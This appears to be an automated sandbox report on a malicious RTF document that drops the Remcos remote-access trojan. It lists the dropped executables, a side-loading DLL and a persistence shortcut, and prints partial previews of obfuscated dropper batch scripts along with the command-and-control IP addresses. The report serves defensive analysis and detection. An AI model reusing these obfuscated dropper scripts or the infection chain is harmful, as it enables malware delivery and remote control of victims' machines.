                                                                                                                                                                                  Preview:L..................F.... .......r.......r...k.g.....J............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X7-..user.8......QK.X.X7-*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.J....X9- .OKHCYJ~1.RTF..J.......WB..WB.*.........................O.K.h.C.y.J.6.1.9.J...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\258555\Users.user\Desktop\OKhCyJ619J.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.K.h.C.y.J.6.1.9.J...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......258555..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                  Entropy (8bit):4.65408698625193
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:HhuxXCm4vTXCv:HhCIc
                                                                                                                                                                                  MD5:FD6867AAC40E4DA458E6757A6EDE3C15
                                                                                                                                                                                  SHA1:6F23A4A87E0EFA3758541FF7F5616EC2CC8C2BF6
                                                                                                                                                                                  SHA-256:AC63475BA516DDC4DD3834DE0F0BC743AE731C76DA068FB3A7FE114F60A56071
                                                                                                                                                                                  SHA-512:904E7373215201D657D59EE58BA4E12E37B874905F86414D96C8F110A102734BFEC0F55B2FF26F226EC6343647F59B928CE3FB49E8BA92E8C13651B3FD4E3C2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[misc]..OKhCyJ619J.LNK=0..[folders]..OKhCyJ619J.LNK=0..

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.4797606462020307
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                                                                                                  MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                                                                                                  SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                                                                                                  SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                                                                                                  SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\hjc.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
                                                                                                                                                                                  SHA-512:617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                                                  C:\Users\user\Desktop\~$hCyJ619J.rtf

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.4797606462020307
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                                                                                                  MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                                                                                                  SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                                                                                                  SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                                                                                                  SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                  C:\Users\Public\Libraries\Null

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3
                                                                                                                                                                                  Entropy (8bit):1.584962500721156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                  MD5:A0B6C3E24F6F2433B030951BC488F759
                                                                                                                                                                                  SHA1:1D383314988E188C925A9B47065E1285E25551E3
                                                                                                                                                                                  SHA-256:9B6DD0F55D1CEA37555DB317F53A0631F694BD46DF8018CC2AEED3D9E2F32F5F
                                                                                                                                                                                  SHA-512:16E024531F95614599758CB3996E5A9303AF312912C7EADE0B27BD46979A6C0704E8D63D09BBBC81F94A3D762F8A256005DCA4A6C531BCD262A8583E7EE7A74F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:7..

                                                                                                                                                                                  C:\Users\Public\Libraries\Rdxcjsng

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):838775
                                                                                                                                                                                  Entropy (8bit):7.166875783186307
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:Y+bkxBJjo3agttuTtoabantboitQpYtxEhMfHU0MlXk5:Y+brFj0etbokxEIHxMlXS
                                                                                                                                                                                  MD5:A4DAEE5EC2AAEAA5ECD3C3F33AB3BB5E
                                                                                                                                                                                  SHA1:58A8A8B55837A59795F6DFA693BE0A9F0F8FCE80
                                                                                                                                                                                  SHA-256:3FD3B4150CA71CFDFAFEE99167AAD611DA29E7B95FB3448929D91FCE983DA61C
                                                                                                                                                                                  SHA-512:FABF21DE7A2A49A4B14389F5E05DDCB933EB97DB29EFF707C3CDA976BF17CFB0C6F7BAE0B016839244EBD43BA7CA8D2F2732A0CAD16BDA45DFBF72D8A11FD567
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa<,=2(0$63(;%)'1&.((3:/+7872(=((&.76==)8)'%$0%=-'9=<==74KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.';&-61*+%/KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa...........z.O.k@3..x&..._.(p.X.a"...m..#..:.=..=Y!=rUm.D.2.N.DY...M..B.,P .n.....8.6.JAy..0.=.E?/..m[..l..Q.4.sY!.fN0..).U..yO..S..Ms`.....P7.1c..M...YNi.Y.,k.\'.BZm)l.`B..g.f.1Bbcc(.Q,..c....Y...B. ....O..`I.bp"022..x>..*...R..[^.'l.Z.o....T....P..ZY._.^.A.Q..d._]..S.nZ.,.P..\`..KId.oJ..f]k.S_.....Pl&.Uq.IM.WO41..'h.....h.4Th.ogo...P1..4./.Ec\H.*..W...X.....Y".R.O..s.....Q/.#..].:...S\.-.Dl.....(|WlD..W..=Plc.%).....I..XW..MQ.=.U.....Arp.;d.Ab'.Dao.[...?..Y..N<...T..M...I~:..;........A/=...?.F.I.Z..,..D........d.X...f..Ci.WI.%..I=.=.['...:.F>.k....%p.7}..<Y.1..X.[PF.i..O..Qi.h..TH......1/2.p.[.-.B..Pj.E.$.L.P..O.Y.7.F".f.e..=.G.RJ.z....4"...e.DM2.N~Zn...c..s.. k.+_.....Pe.@..2.,..G..a.#.A.=.[n_c<.[..0L.[..-Mja..XP.... &$d.#.......~r..z.iS..'.[~......=.CNq..V...RJ..a..nE."e...S.p..=h.....PF]..A.8.\l.T.

                                                                                                                                                                                  C:\Users\Public\Libraries\Rdxcjsng.PIF

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1639424
                                                                                                                                                                                  Entropy (8bit):7.422823450789437
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BNM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyNM6wW4mEQ2W
                                                                                                                                                                                  MD5:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  SHA1:0616B410CC32A9C0C6915B96C44D5C5923CB0F2F
                                                                                                                                                                                  SHA-256:9B751EE322369D92E06044F37716C5066AE3E10C08CA70E0D8A489ACC24888BB
                                                                                                                                                                                  SHA-512:617145481218AEBE78CED75205763DB5874D766EBD70AA9C854826DCD2353F5B179E847E858FF169C8503675F7297C477BA99141C6CACB6ABFF8CD40FE6834FA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h...........u............@..............................................@......................x.......f ...........................@..(c...........................0......................................................CODE.....f.......h.................. ..`DATA.....G.......H...l..............@...BSS.....]................................idata..f ......."..................@....edata..x...........................@..P.tls......... ...........................rdata.......0......................@..P.reloc..(c...@...d..................@..P.rsrc................>..............@..P....................................@..P................................................................................................

                                                                                                                                                                                  C:\Users\Public\Libraries\RdxcjsngO.bat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):30026
                                                                                                                                                                                  Entropy (8bit):3.9380000056299878
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                                                                                                                  MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                                                                                                                  SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                                                                                                                  SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                                                                                                                  SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\RdxcjsngO.bat, Author: ditekSHen
                                                                                                                                                                                  Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                                                                                                                  C:\Users\Public\Libraries\aaa.bat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3646
                                                                                                                                                                                  Entropy (8bit):5.383959173452972
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                                                                                  MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                                                                                  SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                                                                                  SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                                                                                  SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                                                                                                                  C:\Users\Public\Libraries\easinvoker.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):131648
                                                                                                                                                                                  Entropy (8bit):5.225468064273746
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                                                                  MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                                                                  SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                                                                  SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                                                                  SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: fu56fbrtn8.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: VdwJB2cS5l.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Purchase order.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Quotation 20242204.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: pSfqOmM1DG.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: XY2I8rWLkM.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\Public\Libraries\netutils.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):116908
                                                                                                                                                                                  Entropy (8bit):5.087211878722834
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
                                                                                                                                                                                  MD5:566B326055C3ED8E2028AA1E2C1054D0
                                                                                                                                                                                  SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
                                                                                                                                                                                  SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                                                                                                                                                                                  SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.^........& ....."...$................<a.............................0................ ..............................................................`..(...............\........................... ...(................................................... ...0!.......".................. .P`. ........@.......(..............@.p.. .......P.......0..............@.P@. ..(....`.......6..............@.0@. .......p.......:..............@.0@. ..................................p.. ...............<..............@.0@. ...............>..............@.0.. ....X............F..............@.@.. ....h............H..............@.`.. ..\............J..............@.0B/4...................L..............@.PB/19..................P..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                                                                                  C:\Users\Public\Rdxcjsng.url

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):100
                                                                                                                                                                                  Entropy (8bit):5.043954380954318
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMFdI1sjSsb940P8ovn:HRYFVmTWDyz6umjSE940P8y
                                                                                                                                                                                  MD5:4EC1FF7BF5D77704B93B7FE6CF58D5DA
                                                                                                                                                                                  SHA1:70A6806BAE7CA9B927A97FC893CCFFE41D631999
                                                                                                                                                                                  SHA-256:BEE810AB5C900F20F91D84EFB1AA137EA0223A918C778100DF395667AB37BF71
                                                                                                                                                                                  SHA-512:4637B871918A1D3712DD2D17E4F7361412DA8FFE4A44096253F637835EEA0B007B97C17C58F9313AFED181D6D152025E68F263BAEC5675B738CB859E0ACE96EC
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF"..IconIndex=52..HotKey=85..

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Rich Text Format data, version 1
                                                                                                                                                                                  Entropy (8bit):3.2167117679618586
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Rich Text Format (5005/1) 55.56%
                                                                                                                                                                                  • Rich Text Format (4004/1) 44.44%
                                                                                                                                                                                  File name:OKhCyJ619J.rtf
                                                                                                                                                                                  File size:65'610 bytes
                                                                                                                                                                                  MD5:956ae61939b3dc9f9bbaed850423740b
                                                                                                                                                                                  SHA1:4b4df10a00758993952f3528561f7edbc630376e
                                                                                                                                                                                  SHA256:67d023bc333bfbf254e2501026b793921c1bdb9fcff76f5c168c4caaf7887774
                                                                                                                                                                                  SHA512:a48595b3b8d02fec3b1d56595dbe901ed1d81cb028eaa3ec2eb3f6e4b6d3c71b447e008697f199d2afaf885b5acb7af2f19998ee28cb3ec56f439add9a3ba481
                                                                                                                                                                                  SSDEEP:1536:X5nyQDBuHtgHYeiTrk0cM0U6wHwF/TCPEPt6jUeGy5c18blwous6bWWU/m9:X5nyQ4Htg4eiT40cR5FLCPQt6jaUc18o
                                                                                                                                                                                  TLSH:3553BE2EE74F0915DF55967B035A4B4A0AFCB33DB38100A175BC97343BAD82E4A6297C
                                                                                                                                                                                  File Content Preview:{\rtf1.......{\mmodso425718481 \.}.{\500881250);*.%4@2,_.!).>~2]9;/[@?[&0[|?._$%/^<0^12%?&+^.88/)?.~^]!??:-7^8_?(8(_~[-[+4^=3`?8%2<?-7!>9[20)<5^3?.*?~.;?.5&^(-?1-(,/65<:?(;8%]5@:,8&:`@#&)]2?4?.1>~<)$)/78?-_20>#|]$94:-^:'.9]~|@_)4/.+.^%6;6^.?`(.%?.979.?7.<

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:2764a3aaaeb7bdbf

                                                                                                                                                                                  Static RTF Info

                                                                                                                                                                                  Objects

                                                                                                                                                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                                                  000001AD7hno

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                  04/24/24-07:44:31.694493TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  04/24/24-07:42:15.923174TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin491701166192.168.2.22103.186.117.100

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Apr 24, 2024 07:41:53.687639952 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.083240032 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.083338022 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.083610058 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512376070 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512429953 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512468100 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512506962 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512548923 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512548923 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512639046 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922286987 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922311068 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922317982 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922385931 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922462940 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922569990 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922594070 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922667027 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922667980 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922699928 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922741890 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922787905 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922826052 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:55.288683891 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:55.288750887 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:55.288774014 CEST4916380192.168.2.22103.198.26.173
                                                                                                                                                                                  Apr 24, 2024 07:41:55.288827896 CEST8049163103.198.26.173192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:41:55.288844109 CEST4916380192.168.2.22103.198.26.173
